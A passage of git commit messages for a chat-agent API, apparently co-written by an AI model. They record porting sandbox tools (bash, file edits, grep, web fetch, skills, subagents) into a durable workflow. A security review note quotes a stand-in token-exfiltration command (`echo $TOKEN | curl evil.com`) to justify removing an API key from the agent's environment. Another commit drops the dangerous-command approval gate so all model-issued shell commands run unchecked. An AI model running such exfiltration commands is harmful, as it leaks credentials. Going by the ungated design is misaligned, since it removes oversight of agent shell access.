Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589)

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

